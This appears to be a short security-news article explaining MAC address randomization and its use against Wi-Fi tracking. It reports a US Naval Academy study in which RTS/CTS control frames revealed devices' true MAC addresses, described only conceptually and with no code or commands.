What is MAC Address Randomization ?
MAC address randomization is a technique that is used to secure mobile devices from tracing. It replaces the unique ID that makes a mobile’s wireless hardware detectable with some randomly generated numbers. Thereby making it difficult to trace the device and preventing it from being exploited by malicious cyber-criminals.
It is a helpful technique since smartphone’s MAC address is usually logged by owners of public Wi-Fi. Such as at retail outlets so that customers could be recognized the moment they walk in.
This is the same case that we have noticed in public wireless hotspots. For instance, in the UK, Transport for London uses this strategy to monitor Tube passengers. In theory, there is no problem with adopting such practices if the primary goal is to identify customers. However, it becomes a real issue when the data is sold to marketers and ad firms.
MAC Address Randomization Vulnerability
According to research report from US Naval Academy, even MAC address randomization technique is flawed and contain implementation related vulnerabilities.
The researchers successfully tracked 100% of devices (regardless of their make and model) using randomization. They exploited previously existed unknown flaw in the way wireless chipsets handled low-level control frames.
A similar technique used in previous research released in 2016 tracked 50% of smartphones, despite using MAC address randomization.
According to analysis, every single 802.11 network interface of a mobile phone had a 48-bit MAC address layer-2 hardware identifier. This is supposed to be unique on a universal basis.
Previous studies discovered flaws prevailing in the Wi-Fi Protected Setup (WPS) protocol, which can potentially be used to modify the MAC address of a device. The technique that allows this to happen is called Universally Unique IDentifier-Enrollee (UUID-E) reversal.
Attack leveraged low-level control frames
Despite the different ways of handling MAC address randomization in each OS, researchers said devices answered with specific packets (control frames) when they performed a specific request.
The novelty in their method is sending RTS frames to IEEE 802.11 client devices, not APs. Which then used to extract a CTS response message for deriving the true global MAC address of that device.
The result of sending a RTS frame to the global MAC address was that the target device responded with a CTS frame.
A CTS frame, having no source MAC address, is confirmed as a response to attack based on the fact that it was sent to the original, crafted source MAC address.
Once the global MAC address is known, that device can be easily tracked just as if randomization were never enabled.
To protect against attacks on MAC address randomization, researchers recommend a stricter policies when handling these operations.
Some recommendations are included at the end of their research paper.